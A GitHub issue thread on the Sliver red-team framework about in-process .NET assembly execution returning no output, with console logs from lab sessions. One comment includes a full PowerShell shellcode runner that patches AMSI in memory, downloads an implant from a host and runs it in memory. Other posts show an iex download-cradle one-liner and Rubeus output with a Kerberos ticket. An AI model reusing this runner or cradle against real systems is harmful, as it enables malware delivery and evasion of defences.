search

BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0
8.54k stars 1.13k forks source link

In-process .NET assembly execution does not always return output #1067

Open senzee1984 opened 1 year ago

senzee1984 commented 1 year ago

Describe the bug If the execution happens in the process, there is no output.

To Reproduce Steps to reproduce the behavior:

  1. Generate a session stager implant, and execute it.
  2. Select the session, and execute any .NET exe with option -i
  3. Observe that there is no output

Expected behavior I am not sure if it is an intended behavior for in-process execution. @MrAle98 mentioned that if --debug is enabled when generating an implant, we can see the output. Since I generated a stager implant, there is no debug option.

Screenshots

[server] sliver (WELL-KNOWN_UNION) > execute-assembly /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (WELL-KNOWN_UNION) > execute-assembly -i /opt/red/rubeus.exe hash /password:123

[*] Output:

Desktop (please complete the following information):

Additional context The session is obtained from a stager session implant.

senzee1984 commented 1 year ago

A reference: https://github.com/sliverarmory/armory/issues/27#issuecomment-1376409950

moloch-- commented 1 year ago

@rkervella is this something weird to do with the stdout shenanigans?

rkervella commented 1 year ago

Yeah I believe it's an issue with go-clr, I'll have a look.

rkervella commented 1 year ago

@ziyishen97 have you tried with the --amsi-bypass and or --etw-bypass flags?

rkervella commented 1 year ago

Removing the bug tag since I'm unable to reproduce on both Windows 11 and Windows 2019.

senzee1984 commented 1 year ago

The same result

sliver (STRAIGHT_WILLOW) > execute-assembly  -i -M -E /opt/red/rubeus.exe hash /password:123

[*] Output:
senzee1984 commented 1 year ago

Additional information: I cannot get any output from Sliver cli, however, the output can be displayed in the process, such as the powershell cli. I used a powershell download cradle to get a session, as I execute a .NET assembly, the output is displayed in powershell cli

PS C:\Windows\system32> iex(new-object net.webclient).downloadstring('http://192.168.0.44:8080/stager.txt')
True
Downloading sliver.bin

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!
MrAle98 commented 1 year ago

@ziyishen97 Are you using the fork https://github.com/MrAle98/sliver/tree/feat/powershell? May i suggest to you to first try with the latest release of sliver and check if you still get the issue?

senzee1984 commented 1 year ago

@MrAle98 I am using the latest version, and manually modified few files to include the powershell command

All hackers gain exalted
[*] Server v1.5.33 - 79ff35429dd48d361a13c447342966292210ab4f - Dirty
[*] Welcome to the sliver shell, please type 'help' for options
MrAle98 commented 1 year ago

@ziyishen97 Do you keep getting the same issue also without your modifications? Do you have the same issue with beacon type implants?

senzee1984 commented 1 year ago

I tried with latest binary release, it does not have the issue. Thanks for your suggestion. @MrAle98 @rkervella

MrAle98 commented 1 year ago

@ziyishen97 among your modifications is there anything that modifies the implant?

senzee1984 commented 1 year ago

@MrAle98 I made modifications based on the comparison https://github.com/BishopFox/sliver/compare/master...MrAle98:sliver:feat/powershell

MrAle98 commented 1 year ago

@ziyishen97 In the branch you taken there are no modifications on the implant side. It is weird that adding the modifications you can't retrieve the output...

senzee1984 commented 1 year ago

Okay, I find there is inconsistence between sessions. I am using the official latest version. The SYSTEM session has output, while other users' session (including local admin) do not have. @MrAle98 

[server] sliver (AGREEABLE_SPIRITUAL) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

[*] rto has joined the game

[*] rto has joined the game

[server] sliver (AGREEABLE_SPIRITUAL) > sessions

 ID         Transport   Remote Address       Hostname   Username              Operating System   Health  
========== =========== ==================== ========== ===================== ================== =========
 1e58be58   http(s)     192.168.0.61:61122   web01      CHILD\david           windows/amd64      [ALIVE] 
 21084a77   http(s)     192.168.0.61:61124   web01      NT AUTHORITY\SYSTEM   windows/amd64      [ALIVE] 
 cf73a9d6   http(s)     192.168.0.61:61123   web01      CHILD\eric            windows/amd64      [ALIVE] 
 a94ef7ea   http(s)     192.168.0.61:61189   web01      CHILD\eric            windows/amd64      [ALIVE] 

[server] sliver (AGREEABLE_SPIRITUAL) > use 21084a77-c18c-4bf6-8a7d-5addda81f83a

[*] Active session STRAIGHT_WILLOW (21084a77-c18c-4bf6-8a7d-5addda81f83a)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123
[*]       rc4_hmac             : 3DBDE697D71690A769204BEB12283678

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

[server] sliver (STRAIGHT_WILLOW) > use cf73a9d6-2324-4eb5-8602-393091a2fe9c

[*] Active session STRAIGHT_WILLOW (cf73a9d6-2324-4eb5-8602-393091a2fe9c)

[server] sliver (STRAIGHT_WILLOW) > execute-assembly -M -E -i /opt/red/rubeus.exe hash /password:123

[*] Output:
senzee1984 commented 1 year ago

@rkervella @moloch-- Hope you are doing well! Here is an update: I compiled the latest source code without any modification, and the issue still exists. The following session is obtained by executing a powershell shellcode runner

[server] sliver (ILL_FURNACE) > execute-assembly /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFDDCCBQigAwIBBaEDAgEWooIEDDCCBAhhggQEMIIEAKADAgEFoREbD0NISUxELkhUQi5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hJTEQuSFRCLkxPQ0FMo4IDvjCCA7qgAwIBEqEDAgECooIDrASCA6iR09LmbXF8TyskBBDCIE2p854FfXZSwI0vJ5vOisE7l6hXGH9ZCUe5Uaiz6ElcCltUNNEsm5eVLWsZ2S9zW4OyfluXUOi2mFz5nr4j1RjtMAMSZVXgssQeeRKJ++ILKwXwZBcGKLP0ZJRZ9ILLJkZoBET2sLki/a6LLRMFneCIJKnsjpFO0qD5ut9FNYeHzos/iYjNc0s9tFP20JwOGw/hGV6EIwUyFzY6cpJnl5Vyqe2/arjg8SKWtiLWyFPcyWdvgW4VJuaGOKJi+I8aVaonmK/h9HT0GN7exBrhxJr4V+HOhtj8O33e4XcvzOdDQ556KMW15JOfIu2w6Z0b0asJmQMuEai965IHzFieHBIntmJ0x8GC4oExb7mRCcgrf0Yvg+ELKBjChX59FwrQMmkZ+YgwJfJNwpU5kdk8XvakAoWTdd0+rImk6kvrCNQ/ZHHN3Ixgp+7pcea09YLi42G3u+JlTOU0NQGvVIDg36ucBPrloV/zsoPX503zlpYazV0+cB6k9WwvYdmVaXnbrb9ROysUp4n/UZYpFAa8AO8K61SMAOk/RfuQeNaneoiZTzViNzXSpUTN+vAMcx6RDckaWzbAxUKjY1WIHqebyKyCIK/68v8Ipe9LL/dzQi4fNS36kBW1YaTo7rVHAsLh7KlWMVmqhXxsWCy6BrhMJ2LjWwIwl+yAY0nQn6B4IBLAMx0/W2kY/VP0bIVCRqP4GP2tjTwm5467JK0EPMdDacE+CMWyvQxJGBN1Utj6gaBfW6ohnSbttPDHC7G4G32ozONt/sbkBI44nISC0+ZO2ZzWItn0K+Z2bLaGV28w3MkvROHoUIcbNohL7ER6UzctunDNbYY0haYwTJUDo0NjruMffeehnKWRh0IldrsjqKpXVBmsrcs2dHlDT7rI0WY8e5BUqTvrKfrHgePlqfGX8O1fsXn8xAXJsupg0gr4UOqMzyBm6Lat/1F0Xhh8kD1yQumrR6y8E4iWw2wJjHjFrzjCn1tB72NI45TPxDVwpmFt2FXUJG7dkKeljr01Z05jVC06KAglNDvBPcR6XlUDtFnslvX0b7ykw3ucSN9d5u6PuQpqtp5iiypsaQg/VbJYTsK3MsUCn3GJ7mZX+mTzDuR18s0MT1fAQ4UP5Hy/JMf2SHT5hzWdW7g9Wr6E95mr+o6+UQz1FQeexB+TbKY3IzqjmRrVs1XgtyMMlH6YfQW1nzrkJVrCzOJWkYTCKz+6tH4AemTefkflDoyjgeswgeigAwIBAKKB4ASB3X2B2jCB16CB1DCB0TCBzqArMCmgAwIBEqEiBCCmIljc0vpvnb4qIJN4i9m2hdFQyB+BWhfQnxEzC3hHmaERGw9DSElMRC5IVEIuTE9DQUyiETAPoAMCAQGhCDAGGwRlcmljowcDBQBgoQAApREYDzIwMjMwMTI1MDQyOTA0WqYRGA8yMDIzMDEyNTE0MjY1NlqnERgPMjAyMzAyMDEwNDI2NTZaqBEbD0NISUxELkhUQi5MT0NBTKkkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hJTEQuSFRCLkxPQ0FM

[server] sliver (ILL_FURNACE) > execute-assembly --i /opt/red/rubeus.exe tgtdeleg /nowrap
error: invalid flag: --i
[server] sliver (ILL_FURNACE) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

The contents of the powershell shellcode runner

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
     Equals('System.dll')
     }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}

function getDelegateType {
    Param (
     [Parameter(Position = 0, Mandatory = $True)] [Type[]]
     $func, [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('InMemoryModule', $false).
    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
    AutoClass', [System.MulticastDelegate])

  $type.
    DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
     SetImplementationFlags('Runtime, Managed')

  $type.
    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]] (0x48, 0x31, 0xC0) 
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)

Write-Host 'Downloading sliver.bin'
[Byte[]] $buf = (New-Object Net.Webclient).DownloadData('http://192.168.0.44:8080/sliver.bin')
$lpMem =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $buf.length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread =[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)

However, it looks like only stager implant has this issue, stageless implant or spawned session (getsystem) does not have.


[server] sliver (ILL_FURNACE) > generate --http 192.168.0.44 -f exe --debug --save /opt/red/sliver.exe

[*] Generating new windows/amd64 implant binary
[*] Build completed in 15s
[*] Implant saved to /opt/red/sliver.exe

[*] Session d7040874 ABSOLUTE_ADULTHOOD - 192.168.0.61:49894 (web01) - windows/amd64 - Tue, 24 Jan 2023 18:32:36 PST

[server] sliver (ILL_FURNACE) > use d7040874-2ab9-4e04-b55a-3eaabc7c539f

[*] Active session ABSOLUTE_ADULTHOOD (d7040874-2ab9-4e04-b55a-3eaabc7c539f)

[server] sliver (ABSOLUTE_ADULTHOOD) > execute-assembly -i /opt/red/rubeus.exe tgtdeleg /nowrap

[*] Output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dc01.child.htb.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 2h2P5Ig1KZvduEeqipwD+WtfNiEs0gDpAs+ax+BCU6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFDDCCBQigAwIBBaEDAgEWooIEDDCCBAhhggQEMIIEAKADAgEFoREbD0NISUxELkhUQi5MT0NBTKIkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hJTEQuSFRCLkxPQ0FMo4IDvjCCA7qgAwIBEqEDAgECooIDrASCA6iR09LmbXF8TyskBBDCIE2p854FfXZSwI0vJ5vOisE7l6hXGH9ZCUe5Uaiz6ElcCltUNNEsm5eVLWsZ2S9zW4OyfluXUOi2mFz5nr4j1RjtMAMSZVXgssQeeRKJ++ILKwXwZBcGKLP0ZJRZ9ILLJkZoBET2sLki/a6LLRMFneCIJKnsjpFO0qD5ut9FNYeHzos/iYjNc0s9tFP20JwOGw/hGV6EIwUyFzY6cpJnl5Vyqe2/arjg8SKWtiLWyFPcyWdvgW4VJuaGOKJi+I8aVaonmK/h9HT0GN7exBrhxJr4V+HOhtj8O33e4XcvzOdDQ556KMW15JOfIu2w6Z0b0asJmQMuEai965IHzFieHBIntmJ0x8GC4oExb7mRCcgrf0Yvg+ELKBjChX59FwrQMmkZ+YgwJfJNwpU5kdk8XvakAoWTdd0+rImk6kvrCNQ/ZHHN3Ixgp+7pcea09YLi42G3u+JlTOU0NQGvVIDg36ucBPrloV/zsoPX503zlpYazV0+cB6k9WwvYdmVaXnbrb9ROysUp4n/UZYpFAa8AO8K61SMAOk/RfuQeNaneoiZTzViNzXSpUTN+vAMcx6RDckaWzbAxUKjY1WIHqebyKyCIK/68v8Ipe9LL/dzQi4fNS36kBW1YaTo7rVHAsLh7KlWMVmqhXxsWCy6BrhMJ2LjWwIwl+yAY0nQn6B4IBLAMx0/W2kY/VP0bIVCRqP4GP2tjTwm5467JK0EPMdDacE+CMWyvQxJGBN1Utj6gaBfW6ohnSbttPDHC7G4G32ozONt/sbkBI44nISC0+ZO2ZzWItn0K+Z2bLaGV28w3MkvROHoUIcbNohL7ER6UzctunDNbYY0haYwTJUDo0NjruMffeehnKWRh0IldrsjqKpXVBmsrcs2dHlDT7rI0WY8e5BUqTvrKfrHgePlqfGX8O1fsXn8xAXJsupg0gr4UOqMzyBm6Lat/1F0Xhh8kD1yQumrR6y8E4iWw2wJjHjFrzjCn1tB72NI45TPxDVwpmFt2FXUJG7dkKeljr01Z05jVC06KAglNDvBPcR6XlUDtFnslvX0b7ykw3ucSN9d5u6PuQpqtp5iiypsaQg/VbJYTsK3MsUCn3GJ7mZX+mTzDuR18s0MT1fAQ4UP5Hy/JMf2SHT5hzWdW7g9Wr6E95mr+o6+UQz1FQeexB+TbKY3IzqjmRrVs1XgtyMMlH6YfQW1nzrkJVrCzOJWkYTCKz+6tH4AemTefkflDoyjgeswgeigAwIBAKKB4ASB3X2B2jCB16CB1DCB0TCBzqArMCmgAwIBEqEiBCCmIljc0vpvnb4qIJN4i9m2hdFQyB+BWhfQnxEzC3hHmaERGw9DSElMRC5IVEIuTE9DQUyiETAPoAMCAQGhCDAGGwRlcmljowcDBQBgoQAApREYDzIwMjMwMTI1MDQyOTA0WqYRGA8yMDIzMDEyNTE0MjY1NlqnERgPMjAyMzAyMDEwNDI2NTZaqBEbD0NISUxELkhUQi5MT0NBTKkkMCKgAwIBAqEbMBkbBmtyYnRndBsPQ0hJTEQuSFRCLkxPQ0FM
gregohmyeggo commented 1 year ago

I am also seeing this issue on v1.5.31 for both beacons and sessions; staged and stageless.

[*] Server v1.5.31 - d699a8d1401f89fc235cb4bfc4cf58feee87308a - Dirty
[*] Welcome to the sliver shell, please type 'help' for options

Output DOES appear when the shellcode loader is a Console Application, but does NOT return in Sliver console.

rkervella commented 1 year ago

The go-clr library we're using has been updated, and might fix some of these issues. @senzee1984 @gregohmyeggo if you're feeling adventurous, you can try to compile from the master branch and test it out.

Selora commented 11 months ago

Getting the same behavior on v1.5.41

Freshly compiled Seatbelt, --in-process does not yield any output while without this option, it behaves as intended. Apologies for the lack of troubleshooting done on my end, just putting this for tracking.

The implant process is a .NET 6.0 console app, tried in an interactive session.

EDIT:

Tested another implant, .NET 7.0, single-file self-contained published assembly, and I got the output back on both session and beacon.